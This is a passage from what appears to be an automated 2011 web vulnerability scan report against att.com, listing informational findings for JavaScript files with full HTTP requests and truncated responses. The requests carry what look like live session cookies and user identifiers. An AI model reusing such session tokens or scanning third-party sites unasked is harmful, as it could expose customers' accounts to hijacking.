fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 45221
Accept-Ranges: bytes
Last-Modified: Wed, 16 Mar 2011 04:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:44 GMT
Connection: keep-alive

/* This notice must be untouched at all times.

wz_tooltip.js     v. 4.12

The latest version is available at
http://www.walterzorn.com
or http://www.devira.com
or http://www.walterzorn.de

Copyright (c)
...[SNIP]...

10.16. https://www.att.com/olam/js/validate.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/validate.js

Request

GET /olam/js/validate.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 24942
Accept-Ranges: bytes
Last-Modified: Wed, 16 Mar 2011 04:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:38 GMT
Connection: keep-alive

/**************************************************************************

* *

* VALIDATE.JS
...[SNIP]...

10.17. https://www.att.com/olam/js/vidSwitcher.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/vidSwitcher.js

Request

GET /olam/js/vidSwitcher.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; TLTHID=512C2E9A712510718C6AEED8C4C046B3; EDOCSSESSIONID=r1szN4lfnydZWhMhvtpJVyfNPtvCBTvgwJDhpT052DpQKDVvKqRC!725500378; stack=doammw31; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1287
Accept-Ranges: bytes
Last-Modified: Wed, 16 Mar 2011 04:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:17 GMT
Connection: keep-alive

/*-----------------------------------------------------------------------------------------------*/
// vidSwitcher.js
// switches parameters for flash embed tag so that a single tag can be reused
//
...[SNIP]...

10.18. https://www.att.com/olam/jsp/profile/imageupload/BrowserDetect.js  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/jsp/profile/imageupload/BrowserDetect.js

Request

GET /olam/jsp/profile/imageupload/BrowserDetect.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 2680
Accept-Ranges: bytes
Last-Modified: Wed, 16 Mar 2011 04:31:22 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:34 GMT
Connection: keep-alive

// JavaScript Document
var browse;
var os;
var SafariMacUser = false;
var BrowserDetect = {
   init: function () {
       this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
       browse
...[SNIP]...

Report generated by XSS.CX at Thu Apr 28 10:55:28 CDT 2011.